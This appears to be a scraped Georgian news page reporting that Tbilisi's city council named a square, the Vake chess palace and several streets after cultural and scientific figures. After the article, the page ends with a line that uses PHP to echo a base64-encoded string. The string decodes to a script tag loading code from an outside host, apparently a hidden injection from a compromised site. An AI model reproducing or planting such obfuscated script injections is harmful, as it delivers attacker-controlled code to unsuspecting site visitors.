celsiusi
ავერსი საქკაბელი
დღეს, თბილისის საკრებულოს სხდომაზე, სახელდებისა და სიმბოლიკის კომისიის თავმჯდომარემ ნინო ვარდოსანიძემ დედაქალაქში რამდენიმე გეოგრაფიული ობიექტის სახელდების საკითხები წარადგინა. 
 
საკრებულოს გადაწყვეტილებით, საბურთალოს რაიონში, ადამ მიცკევიჩის ქუჩასთან მდებარე უსახელო სკვერს მომღერალ თემურ წიკლაურის სახელი მიენიჭა. ვერის ბაღში მდებარე ჭადრაკის სასახლეს მოჭადრაკე, მსოფლიოს ხუთგზის ჩემპიონის ნონა გაფრინდაშვილის სახელი ეწოდა. დედაქალაქის ერთ-ერთ ქუჩას,  ქართველი მეცნიერის და  გენეტიკოსის, გენეტიკური დაქტილოსკოპიის მეთოდის (ე.წ. დნმ-ის ტესტი) აღმომჩენის აპოლონ ჯინჭარაძის სახელი მიენიჭა. ვაკის რაიონში, ერთ-ერთ უსახელო ქუჩას მომღერალ ნუგზარ აფხაიძის სახელი ეწოდა. ასევე, ვაკის რაიონში მდებარე უსახელო ქუჩას კომპოზიტორ ავთანდილ შარვაძის სახელი მიენიჭა. საკრებულოს წევრებმა ასევე რამდენიმე ჩიხისა და შესახვევის სახელდებას დაუჭირეს მხარი.
 
 
1723
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");